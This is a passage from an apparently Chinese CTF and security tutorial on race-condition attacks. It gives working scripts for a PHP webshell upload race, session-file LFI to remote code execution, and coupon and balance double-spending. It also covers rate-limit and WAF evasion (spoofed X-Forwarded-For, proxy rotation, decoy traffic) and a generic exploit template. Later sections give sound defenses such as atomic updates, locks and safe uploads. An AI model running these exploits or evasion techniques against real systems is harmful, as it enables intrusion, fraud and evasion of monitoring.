    """持续上传 PHP WebShell"""
    s = requests.Session()
    count = 0
    while not stop_flag.is_set():
        s.post(
            f"{TARGET}/upload.php",
            files={"file": (FILENAME, SHELL.encode(), "image/jpeg")},
            timeout=5
        )
        count += 1
    print(f"[*] 上传 {count} 次")

def access_loop():
    """持续访问上传路径,检测是否执行"""
    s = requests.Session()
    url = f"{TARGET}/uploads/{FILENAME}?cmd=id"
    while not stop_flag.is_set():
        try:
            r = s.get(url, timeout=2)
            if "uid=" in r.text:
                stop_flag.set()
                print(f"[!] 竞争成功!RCE 触发!")
                print(f"    结果:{r.text[:200]}")
                # 继续执行其他命令
                for cmd in ["cat /flag", "whoami", "ls /"]:
                    r2 = s.get(f"{TARGET}/uploads/{FILENAME}?cmd={cmd}")
                    print(f"    {cmd}: {r2.text.strip()}")
                break
        except:
            pass

# 5 个上传线程 + 5 个访问线程
threads = (
    [threading.Thread(target=upload_loop) for _ in range(5)] +
    [threading.Thread(target=access_loop) for _ in range(5)]
)
print("[*] 开始竞争攻击...")
for t in threads:
    t.daemon = True
    t.start()
for t in threads:
    t.join(timeout=60)

7.2 PHP Session 文件竞争

<?php
// ── PHP Session 文件默认存储在 /tmp/sess_<sessionid> ──
// 可以利用 LFI + Session 文件竞争写入 WebShell

// 第一步:找到 LFI 漏洞
// include($_GET['page'] . '.php');

// 第二步:Session 文件内容可控(通过 user 参数写入 session)
session_start();
$_SESSION['data'] = $_GET['data'];  // 用户可控 → 写入 session 文件

// 第三步:
// 并发 1:发送含 PHP 代码的 data 参数
//   data = <?php system($_GET['cmd']); ?>
// 并发 2:LFI 包含 session 文件
//   page = /tmp/sess_SESSID(去掉 .php 后缀的情况需绕过)

// Session 文件内容示例(/tmp/sess_abc123):
// data|s:30:"<?php system($_GET['cmd']); ?>";
?>
#!/usr/bin/env python3
"""PHP Session 文件 + LFI 竞争"""
import threading, requests

TARGET    = "http://target.com"
SESS_ID   = "abc123def456"   # 已知或可预测的 Session ID
SHELL_CODE = "<?php system($_GET['cmd']); ?>"

session_with_shell = requests.Session()
session_with_shell.cookies.set("PHPSESSID", SESS_ID)

def write_shell_to_session():
    """持续将 Shell 代码写入 Session"""
    while not stop.is_set():
        session_with_shell.get(
            f"{TARGET}/page.php",
            params={"data": SHELL_CODE},
            timeout=3
        )

def lfi_include_session():
    """持续通过 LFI 包含 Session 文件"""
    s = requests.Session()
    while not stop.is_set():
        r = s.get(
            f"{TARGET}/view.php",
            params={
                "file": f"/tmp/sess_{SESS_ID}",
                "cmd":  "id"
            },
            timeout=3
        )
        if "uid=" in r.text:
            stop.set()
            print(f"[!] 成功!{r.text[:200]}")

stop = threading.Event()
threads = (
    [threading.Thread(target=write_shell_to_session) for _ in range(5)] +
    [threading.Thread(target=lfi_include_session) for _ in range(5)]
)
for t in threads: t.daemon = True; t.start()
for t in threads: t.join(timeout=30)

7.3 Flask/Django 竞争场景

# ── Flask 漏洞场景 ──

from flask import Flask, session, request, jsonify
from database import db

app = Flask(__name__)

# 危险:非原子的积分扣除操作
@app.route('/api/redeem', methods=['POST'])
def redeem():
    user_id = session['user_id']
    item_id = request.json['item_id']
    item    = db.items.get(item_id)

    # ① 检查积分
    user = db.users.get(user_id)
    if user['points'] < item['cost']:
        return jsonify({"error": "积分不足"}), 400

    # ── 竞争窗口 ──
    # Flask 默认多线程处理请求(threaded=True)
    # 多个请求可以同时到达这里

    # ② 扣除积分
    db.execute(
        "UPDATE users SET points = points - ? WHERE id = ?",
        item['cost'], user_id
    )

    # ③ 发放商品
    db.execute(
        "INSERT INTO user_items (user_id, item_id) VALUES (?, ?)",
        user_id, item_id
    )

    return jsonify({"success": True})
#!/usr/bin/env python3
"""针对 Python Web 应用的竞争攻击"""
import asyncio, aiohttp

TARGET  = "http://target.com"
COOKIES = {"session": "YOUR_SESSION_COOKIE"}

async def redeem_item(session, item_id, idx):
    try:
        async with session.post(
            f"{TARGET}/api/redeem",
            json    = {"item_id": item_id},
            cookies = COOKIES,
            timeout = aiohttp.ClientTimeout(total=10)
        ) as r:
            return {"idx": idx, "status": r.status, "body": await r.text()}
    except Exception as e:
        return {"idx": idx, "error": str(e)}

async def main():
    N = 40
    async with aiohttp.ClientSession() as s:
        # 并发兑换同一商品 40 次
        tasks   = [redeem_item(s, item_id=1001, idx=i) for i in range(N)]
        results = await asyncio.gather(*tasks)

    ok = sum(1 for r in results if r.get("status") == 200)
    print(f"[+] Python 应用竞争成功 {ok}/{N} 次")
    # 理论上 40 积分应只能兑换 1 件商品
    # 竞争成功后可兑换多件

asyncio.run(main())

八、CTF 实战思路与工具

8.1 解题决策树

发现可能存在竞争漏洞的功能
    │
    ├── 识别特征
    │   ├── "只能使用一次" 的限制
    │   ├── "每用户限制 N 次" 的配额
    │   ├── 余额/积分/库存检查后扣除
    │   ├── 文件上传 + 验证 + 删除/移动
    │   ├── Token/验证码一次性使用
    │   └── 先检查再执行的二步操作
    │
    ├── 分析竞争窗口
    │   ├── 找到"检查"和"执行"之间的操作
    │   ├── 是否涉及外部 I/O(数据库/文件)→ 窗口更大
    │   ├── 估算窗口大小(>1ms 普通并发,<1ms 需单包攻击)
    │   └── 是否有事务保护(SELECT FOR UPDATE / SERIALIZABLE)
    │
    ├── 选择攻击方式
    │   ├── 窗口 > 10ms  → 普通并发(threading / asyncio)
    │   ├── 窗口 1-10ms  → 最后字节同步 / 高并发
    │   ├── 窗口 < 1ms   → HTTP/2 单包攻击
    │   └── 文件竞争     → 持续上传 + 持续访问
    │
    ├── 调整参数
    │   ├── 增加并发数(10 → 50 → 100)
    │   ├── 开启连接预热
    │   ├── 使用 Barrier 同步
    │   └── 多次尝试(竞争具有概率性)
    │
    └── 验证结果
        ├── 成功次数 > 1 → 竞争漏洞存在
        ├── 检查副作用(余额变化/文件存在/权限变化)
        └── 利用竞争读取 flag / 获取权限

8.2 常见 CTF 竞争题型

# ══ 题型一:优惠码/优惠券无限使用 ══
# 并发调用 redeem/apply-coupon 端点
# 成功多次 → 获得超额折扣/积分/flag

# ══ 题型二:文件上传竞争 ══
# 上传 WebShell → 在删除前访问
# PHP 场景:shell.php 被验证删除前执行
# 通常需要:5 上传线程 + 5 访问线程

# ══ 题型三:账户余额/积分超额消费 ══
# 账户只有 100 积分,商品需 100 积分
# 并发 50 个兑换请求 → 兑换多个商品
# → 商品可能包含 flag 或权限

# ══ 题型四:验证码/Token 竞争 ══
# 获得一次性 Token → 并发使用多次
# 第一次:实际修改
# 后续:利用竞争执行更多操作

# ══ 题型五:注册竞争 ══
# 并发注册 admin 用户名/邮箱
# 两个请求都通过唯一性检查
# → 创建两个 admin 账号(其中一个可能有管理员权限)

# ══ 题型六:并发下单 ══
# 库存 = 1,价格 = 100000(买不起)
# 发现 VIP 优惠码 = 99% 折扣
# 竞争:同时应用优惠 + 下单
# → 以极低价格购买商品 → 获得 flag

8.3 Burp Suite 竞争攻击详细流程

── 方法一:Turbo Intruder 竞争脚本 ──

① 在 Proxy 拦截目标请求
② 右键 → Extensions → Turbo Intruder → Send to Turbo Intruder
③ 粘贴以下脚本:

def queueRequests(target, wordlists):
    engine = RequestEngine(
        endpoint              = target.endpoint,
        concurrentConnections = 1,
        requestsPerConnection = 20,
        pipeline              = False,
    )
    for _ in range(20):
        engine.queue(target.req, gate='race1')
    engine.openGate('race1')

def handleResponse(req, interesting):
    table.add(req)

④ 点击 Attack 按钮
⑤ 观察响应表格中是否有多个 200 成功响应

── 方法二:Repeater 请求组(Burp 2023+)──

① 在 Repeater 中构造请求
② 右键 → Add to group(或 Ctrl+G)
③ 复制多个 Tab 到同一组
④ 选择组 → Send group (single-packet attack)
⑤ 观察响应时序

── 方法三:Intruder 并发 ──
① 发送到 Intruder
② Attack type: Sniper
③ 添加一个参数为 payload(如线程编号)
④ Payloads: 数字列表 1-50
⑤ Resource Pool: 创建新资源池
   Maximum concurrent requests: 50
   Delay between requests: 0
⑥ Start Attack

8.4 竞争攻击辅助工具

# ── 工具一:race-the-web ──
# Go 语言编写的竞争条件测试工具
# https://github.com/nicowillis/race-the-web
go install github.com/nicowillis/race-the-web@latest

# 配置文件 config.toml
cat > config.toml << 'EOF'
[[request]]
method     = "POST"
url        = "http://target.com/api/coupon/use"
body       = '{"code":"RACE50","user_id":1001}'
headers    = {"Content-Type"="application/json", "Cookie"="session=xxx"}
count      = 50       # 并发数
verbose    = true
EOF

race-the-web config.toml

# ── 工具二:ffuf 并发测试 ──
# 使用 ffuf 进行并发请求
ffuf -u "http://target.com/api/coupon/use" \
     -X POST \
     -H "Content-Type: application/json" \
     -d '{"code":"RACE50","user_id":1001}' \
     -w /dev/stdin \
     -t 50 \
     <<< $(for i in $(seq 1 50); do echo $i; done)

# ── 工具三:ab(Apache Benchmark)──
# 100 个并发请求,共 1000 次
ab -n 1000 -c 100 \
   -T "application/json" \
   -p /tmp/payload.json \
   "http://target.com/api/coupon/use"

# ── 工具四:vegeta ──
# 精确的 HTTP 负载测试工具
echo "POST http://target.com/api/coupon/use" | \
vegeta attack \
    -rate=0 \
    -max-workers=50 \
    -duration=0 \
    -body=/tmp/payload.json \
    -header="Content-Type: application/json" | \
vegeta report

九、WAF 绕过与对抗

9.1 速率限制绕过

#!/usr/bin/env python3
"""
绕过速率限制的并发攻击技巧
"""
import asyncio, aiohttp, random

TARGET = "http://target.com"

# ── 技巧一:轮换请求头(绕过基于 User-Agent 的限制)──
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
    "PostmanRuntime/7.32.1",
    "python-requests/2.31.0",
]

# ── 技巧二:轮换 IP(绕过基于 IP 的速率限制)──
# 如果有多个出口 IP(VPN/代理池)
PROXIES = [
    "http://proxy1:8080",
    "http://proxy2:8080",
    "http://proxy3:8080",
]

# ── 技巧三:X-Forwarded-For 伪造(绕过简单 IP 限制)──
# 注意:只对不正确实现的 rate limit 有效
FAKE_IPS = [f"192.168.{i}.{j}" for i in range(1,20) for j in range(1,20)]

async def race_with_header_rotation(url, data, n=50):
    """使用请求头轮换绕过简单的速率限制"""
    results = []
    async with aiohttp.ClientSession() as s:
        async def single(idx):
            headers = {
                "User-Agent":       random.choice(USER_AGENTS),
                "X-Forwarded-For":  random.choice(FAKE_IPS),
                "X-Real-IP":        random.choice(FAKE_IPS),
                "Content-Type":     "application/json",
            }
            try:
                async with s.post(url, json=data,
                                  headers=headers,
                                  timeout=aiohttp.ClientTimeout(total=10)) as r:
                    return {"idx": idx, "status": r.status}
            except Exception as e:
                return {"idx": idx, "error": str(e)}

        tasks   = [single(i) for i in range(n)]
        results = await asyncio.gather(*tasks)

    ok = sum(1 for r in results if r.get("status") == 200)
    print(f"[+] 成功 {ok}/{n}")
    return results

asyncio.run(race_with_header_rotation(
    f"{TARGET}/api/coupon/use",
    {"code": "TEST50", "user_id": 1001}
))

9.2 WAF 检测竞争请求的规避

#!/usr/bin/env python3
"""
规避 WAF 对并发攻击的检测
"""
import threading, requests, time, random

TARGET = "http://target.com"

# ── 规避策略一:加入随机微延迟(避免完全一致的时序特征)──
def jittered_race(url, data, n=30, jitter_ms=5):
    """带抖动的竞争攻击(避免被 WAF 识别为自动化攻击)"""
    results = [None] * n
    barrier = threading.Barrier(n)

    def worker(idx):
        barrier.wait()
        # 加入 0-jitter_ms 毫秒的随机延迟
        time.sleep(random.uniform(0, jitter_ms / 1000))
        r = requests.post(url, json=data, timeout=10)
        results[idx] = r.status_code

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads: t.start()
    for t in threads: t.join()
    return results

# ── 规避策略二:混合正常请求(降低请求密度)──
def mixed_race(url, data, decoy_url, n=20):
    """混合正常请求,降低竞争请求的识别特征"""
    results = []

    def attack_request(idx):
        r = requests.post(url, json=data, timeout=10)
        results.append({"type": "attack", "status": r.status_code})

    def decoy_request():
        requests.get(decoy_url, timeout=5)

    threads = []
    for i in range(n):
        threads.append(threading.Thread(target=attack_request, args=(i,)))
        # 每个攻击请求混入 2 个正常请求
        threads.append(threading.Thread(target=decoy_request))
        threads.append(threading.Thread(target=decoy_request))

    barrier = threading.Barrier(len(threads))
    for t in threads:
        original_run = t._target
        original_args = t._args
        def new_run(fn=original_run, args=original_args):
            barrier.wait()
            fn(*args)
        t.run = new_run

    for t in threads: t.start()
    for t in threads: t.join()
    return results

十、防御措施

10.1 数据库层面防御

-- ══ 方案一:原子性 UPDATE(最推荐)══
-- 将"检查 + 修改"合并为一个原子操作
-- 只有条件满足时才更新,通过返回的影响行数判断

-- 优惠券使用(原子操作)
UPDATE coupons
SET    used = TRUE, used_by = ?, used_at = NOW()
WHERE  code = ? AND used = FALSE;
-- 返回影响行数:1 = 成功,0 = 已使用或无效

-- 余额扣除(带条件检查)
UPDATE accounts
SET    balance = balance - ?
WHERE  user_id = ? AND balance >= ?;
-- 返回影响行数:1 = 成功,0 = 余额不足(原子检查!)

-- 库存扣减
UPDATE products
SET    stock = stock - ?
WHERE  id = ? AND stock >= ?;

-- ══ 方案二:SELECT FOR UPDATE(悲观锁)══
BEGIN;
SELECT balance FROM accounts
WHERE  user_id = 1001
FOR    UPDATE;            -- 行级写锁,其他事务等待
-- 在此执行检查和更新
UPDATE accounts SET balance = balance - 100 WHERE user_id = 1001;
COMMIT;

-- ══ 方案三:乐观锁(版本号)══
-- 读取时记录版本号
SELECT balance, version FROM accounts WHERE user_id = 1001;
-- 更新时检查版本号
UPDATE accounts
SET    balance = balance - 100, version = version + 1
WHERE  user_id = 1001 AND version = ?;
-- 若返回 0 行 → 被其他事务修改 → 重试

-- ══ 方案四:UNIQUE 约束 + INSERT IGNORE ══
-- 防止重复使用
INSERT INTO coupon_usage (coupon_code, user_id)
VALUES (?, ?)
ON DUPLICATE KEY UPDATE id = id;  -- MySQL
-- 或
INSERT INTO coupon_usage (coupon_code, user_id)
VALUES (?, ?)
ON CONFLICT DO NOTHING;            -- PostgreSQL
-- 通过唯一约束确保只能插入一条记录

10.2 应用层面防御

# ── 方案一:分布式锁(Redis)──
import redis
import uuid
import time

redis_client = redis.Redis(host='localhost', port=6379)

class DistributedLock:
    def __init__(self, key: str, expire: int = 10):
        self.key    = f"lock:{key}"
        self.token  = str(uuid.uuid4())
        self.expire = expire

    def acquire(self, timeout: float = 5.0) -> bool:
        """尝试获取锁(带超时)"""
        deadline = time.time() + timeout
        while time.time() < deadline:
            # SET key value NX EX expire(原子性 SET + 检查)
            ok = redis_client.set(
                self.key, self.token,
                nx=True, ex=self.expire
            )
            if ok:
                return True
            time.sleep(0.01)    # 10ms 重试间隔
        return False

    def release(self):
        """释放锁(使用 Lua 脚本保证原子性)"""
        lua = """
        if redis.call('get', KEYS[1]) == ARGV[1] then
            return redis.call('del', KEYS[1])
        else
            return 0
        end
        """
        redis_client.eval(lua, 1, self.key, self.token)

    def __enter__(self):
        if not self.acquire():
            raise Exception(f"获取锁超时:{self.key}")
        return self

    def __exit__(self, *args):
        self.release()


# ── 使用分布式锁 ──
@app.route('/api/coupon/use', methods=['POST'])
def use_coupon():
    user_id = session['user_id']
    code    = request.json['code']

    # 对每个用户+优惠码组合加锁(防止同一用户并发使用)
    lock_key = f"coupon:{code}:{user_id}"

    try:
        with DistributedLock(lock_key, expire=5):
            # 在锁保护下执行检查和更新
            coupon = db.query_one("SELECT * FROM coupons WHERE code=?", code)
            if not coupon or coupon['used']:
                return jsonify({"error": "无效"}), 400

            db.execute("UPDATE coupons SET used=1 WHERE code=?", code)
            db.execute("UPDATE users SET balance=balance+50 WHERE id=?", user_id)
            return jsonify({"success": True})

    except Exception as e:
        return jsonify({"error": "请求过于频繁,请重试"}), 429
# ── 方案二:幂等性设计 ──

import hashlib, redis, json

redis_client = redis.Redis()

def idempotent_operation(idempotency_key: str, operation, *args):
    """
    幂等性操作包装器
    相同的 idempotency_key 只执行一次
    """
    cache_key = f"idempotent:{idempotency_key}"

    # 检查是否已执行过
    cached = redis_client.get(cache_key)
    if cached:
        return json.loads(cached)  # 返回之前的结果

    # 执行操作(使用 SETNX 确保只执行一次)
    lock_key = f"lock:{cache_key}"
    if not redis_client.setnx(lock_key, 1):
        # 其他请求正在执行,等待
        for _ in range(50):
            import time; time.sleep(0.1)
            cached = redis_client.get(cache_key)
            if cached:
                return json.loads(cached)
        raise Exception("操作超时")

    try:
        redis_client.expire(lock_key, 30)
        result = operation(*args)
        # 缓存结果(避免重复执行)
        redis_client.setex(cache_key, 3600, json.dumps(result))
        return result
    finally:
        redis_client.delete(lock_key)


# 使用:前端传入幂等性 Key(如 UUID)
@app.route('/api/payment', methods=['POST'])
def payment():
    idem_key = request.headers.get('Idempotency-Key')
    if not idem_key:
        return jsonify({"error": "缺少 Idempotency-Key"}), 400

    user_id = session['user_id']
    amount  = request.json['amount']

    def do_payment():
        # 实际扣款逻辑
        db.execute("UPDATE accounts SET balance=balance-? WHERE id=?",
                   amount, user_id)
        return {"success": True, "txn_id": str(uuid.uuid4())}

    result = idempotent_operation(
        f"{user_id}:{idem_key}",
        do_payment
    )
    return jsonify(result)

10.3 文件操作防御

import os, uuid, magic, hashlib

ALLOWED_MIME_TYPES = {'image/jpeg', 'image/png', 'image/gif', 'image/webp'}
UPLOAD_BASE        = '/var/secure/uploads'

def safe_upload(file_data: bytes, original_name: str) -> str:
    """安全的文件上传处理"""

    # ① 检查文件魔术字节(而不是扩展名)
    mime = magic.from_buffer(file_data, mime=True)
    if mime not in ALLOWED_MIME_TYPES:
        raise ValueError(f"不允许的文件类型:{mime}")

    # ② 生成随机文件名(不使用原始文件名)
    ext      = {'image/jpeg': '.jpg', 'image/png': '.png',
                'image/gif':  '.gif', 'image/webp': '.webp'}[mime]
    new_name = f"{uuid.uuid4().hex}{ext}"

    # ③ 原子性写入(先写临时文件,再原子重命名)
    tmp_path  = f"/tmp/upload_{uuid.uuid4().hex}"
    final_path = os.path.join(UPLOAD_BASE, new_name)

    try:
        with open(tmp_path, 'wb') as f:
            f.write(file_data)

        # os.rename 是原子操作(同一文件系统)
        # 避免了先创建空文件再写入的竞争
        os.rename(tmp_path, final_path)

    except Exception as e:
        if os.path.exists(tmp_path):
            os.unlink(tmp_path)
        raise e

    return new_name

# 文件上传目录权限配置
# chmod 700 /var/secure/uploads  → 只有 Web 用户可访问,不可直接 HTTP 访问
# 通过应用层提供受控的文件下载,不直接暴露目录

10.4 防御检查清单

数据库层:
  ✅ 所有余额/库存/次数的扣减使用带条件的原子 UPDATE
  ✅ 关键操作使用数据库事务(至少 READ COMMITTED 隔离级别)
  ✅ 高并发场景使用 SELECT FOR UPDATE 行锁
  ✅ 唯一性约束使用数据库 UNIQUE INDEX(而非应用层检查)
  ✅ 避免在应用层执行"先 SELECT 再 UPDATE"的两步操作

应用层:
  ✅ 对关键操作实施分布式锁(Redis SETNX / Redlock)
  ✅ 设计幂等 API(使用 Idempotency-Key)
  ✅ 对同一用户的相同操作添加请求级别的防重复机制
  ✅ 异步任务使用消息队列(单消费者确保顺序)

文件操作:
  ✅ 文件验证和存储合并为原子操作(先验证,通过后原子写入)
  ✅ 使用随机文件名(不可预测)
  ✅ 临时文件目录不可通过 HTTP 直接访问
  ✅ 使用文件魔术字节验证,而非扩展名

接口层:
  ✅ 对高敏感接口添加速率限制(IP + 用户双维度)
  ✅ 关键操作添加验证码/二次确认
  ✅ 监控异常的并发请求模式(同一用户短时间大量相同请求)
  ✅ 在响应中包含幂等性标识,避免客户端重复发送

监控与审计:
  ✅ 记录所有关键操作的执行日志(含时间戳和请求 ID)
  ✅ 对余额/积分/库存异常变化设置告警
  ✅ 定期检查数据一致性(如余额不应为负)
  ✅ 部署 WAF 规则,检测短时间内大量相同请求

附录

A. 竞争条件漏洞速查表

场景 竞争点 攻击方式 影响
优惠码使用 检查 used=0 → 标记 used=1 并发 50 请求 多次使用
余额扣款 检查余额 → 扣减余额 并发请求 余额透支
文件上传 文件验证 → 文件删除 上传+访问循环 WebShell RCE
密码重置 Token 验证 → Token 消费 并发请求 Token 多次用
积分兑换 检查积分 → 扣除积分 并发请求 负积分
用户注册 邮箱唯一性检查 → 插入 并发注册 重复账号
OTP 验证 验证 OTP → 标记已用 并发验证 OTP 复用
账号封禁 读封禁状态 → 执行操作 竞争时机 绕过封禁
文件删除 检查权限 → 删除文件 TOCTOU 删除他人文件
库存购买 检查库存 → 扣减库存 并发下单 超卖

B. 工具速查

# ── Python 并发攻击(推荐)──
# 见本文脚本

# ── Burp Turbo Intruder ──
# 见第十七章

# ── race-the-web ──
go install github.com/nicowillis/race-the-web@latest
race-the-web config.toml

# ── Apache Benchmark ──
ab -n 1000 -c 100 -T application/json -p payload.json http://target.com/api/

# ── wrk(HTTP 基准测试)──
wrk -t10 -c50 -d5s -s race.lua http://target.com/api/

# ── Vegeta ──
echo "POST http://target.com/api/coupon" | vegeta attack -rate=0 -max-workers=50 -body=payload.json | vegeta report

# ── curl 并发(快速测试)──
for i in $(seq 1 50); do
    curl -s -X POST http://target.com/api/coupon \
         -H "Content-Type: application/json" \
         -d '{"code":"TEST"}' &
done
wait

C. 关键 Python 库

# 安装所需库
pip install requests aiohttp httpx asyncio threading

# httpx(支持 HTTP/2 单包攻击)
pip install httpx[http2]

# 其他有用库
pip install python-magic  # 文件类型检测
pip install redis         # 分布式锁

D. 竞争条件 CTF 解题一键脚本模板

#!/usr/bin/env python3
"""
条件竞争 CTF 解题通用模板
根据题目需要修改 TARGET、PAYLOAD 和判断条件
"""
import asyncio, aiohttp, threading, requests
import time, sys, argparse

TARGET  = "http://target.com"
N       = 50    # 并发数

# ══ 方案一:asyncio 异步(推荐)══
async def async_race(url, payload, n=N, cookie=None):
    headers = {}
    if cookie:
        headers["Cookie"] = cookie

    async with aiohttp.ClientSession(headers=headers) as s:
        tasks = [
            s.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=10))
            for _ in range(n)
        ]
        responses = await asyncio.gather(*tasks, return_exceptions=True)

    ok = 0
    for r in responses:
        if not isinstance(r, Exception) and r.status == 200:
            ok += 1
    print(f"[+] asyncio 竞争:{ok}/{n} 成功")
    return ok

# ══ 方案二:threading(备选)══
def thread_race(url, payload, n=N, cookie=None):
    results = [None] * n
    barrier = threading.Barrier(n)
    headers = {"Content-Type": "application/json"}
    if cookie:
        headers["Cookie"] = cookie

    def worker(idx):
        barrier.wait()
        r = requests.post(url, json=payload, headers=headers, timeout=10)
        results[idx] = r.status_code

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads: t.start()
    for t in threads: t.join()

    ok = sum(1 for r in results if r == 200)
    print(f"[+] threading 竞争:{ok}/{n} 成功")
    return ok

# ══ 主程序 ══
if __name__ == "__main__":
    # 修改以下参数
    URL     = f"{TARGET}/api/coupon/use"
    PAYLOAD = {"code": "FLAG_COUPON", "user_id": 1001}
    COOKIE  = "session=YOUR_SESSION_COOKIE"

    print(f"[*] 目标:{URL}")
    print(f"[*] 并发数:{N}")
    print(f"[*] Payload:{PAYLOAD}")
    print()

    # 尝试 asyncio 方案
    ok = asyncio.run(async_race(URL, PAYLOAD, N, COOKIE))

    if ok <= 1:
        print("[*] asyncio 效果不佳,尝试 threading 方案...")
        ok = thread_race(URL, PAYLOAD, N, COOKIE)

    if ok <= 1:
        print("[!] 竞争窗口可能很小,建议尝试:")
        print("    1. 增加并发数(N=100+)")
        print("    2. 使用 HTTP/2 单包攻击(见 httpx 章节)")
        print("    3. 使用 Burp Turbo Intruder + gate 同步")
        print("    4. 检查是否需要预热连接")
    else:
        print(f"\n[!] 竞争成功!{ok} 次操作通过")

⚠️ 免责声明:本文档仅供 CTF 竞赛学习、安全研究及授权渗透测试使用。在未经授权的系统上进行条件竞争攻击属于违法行为,请在合法合规的环境中学习与实践。